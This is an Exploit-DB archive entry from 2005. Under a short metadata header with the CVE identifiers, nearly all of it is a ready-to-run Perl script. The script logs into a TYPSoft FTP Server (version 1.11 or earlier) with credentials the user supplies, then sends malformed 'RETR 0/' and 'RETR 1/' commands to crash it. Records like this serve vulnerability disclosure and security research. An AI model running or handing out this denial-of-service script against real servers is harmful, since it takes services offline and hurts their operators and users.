TYPSoft FTP Server <= 1.11 RETR Denial of Service Vulnerability

2005-10-14T00:00:00
ID EDB-ID:1251
Type exploitdb
Reporter wood
Modified 2005-10-14T00:00:00

Description

TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability. CVE-2001-1156,CVE-2005-3294. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server &lt;= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

if($#ARGV &lt; 2 | $#ARGV &gt; 3) { die "usage: perl typsoft-1.11-DOS.pl &lt;host&gt; &lt;user&gt; &lt;pass&gt; [port]\n" };
if($#ARGV &gt; 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;$adr,
PeerPort=&gt;$prt, Reuse=&gt;1) or die "Error: cant connect to $adr:$prt\n";

$remote-&gt;autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die 
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= &lt;STDIN&gt;;
close $remote; 

# milw0rm.com [2005-10-14]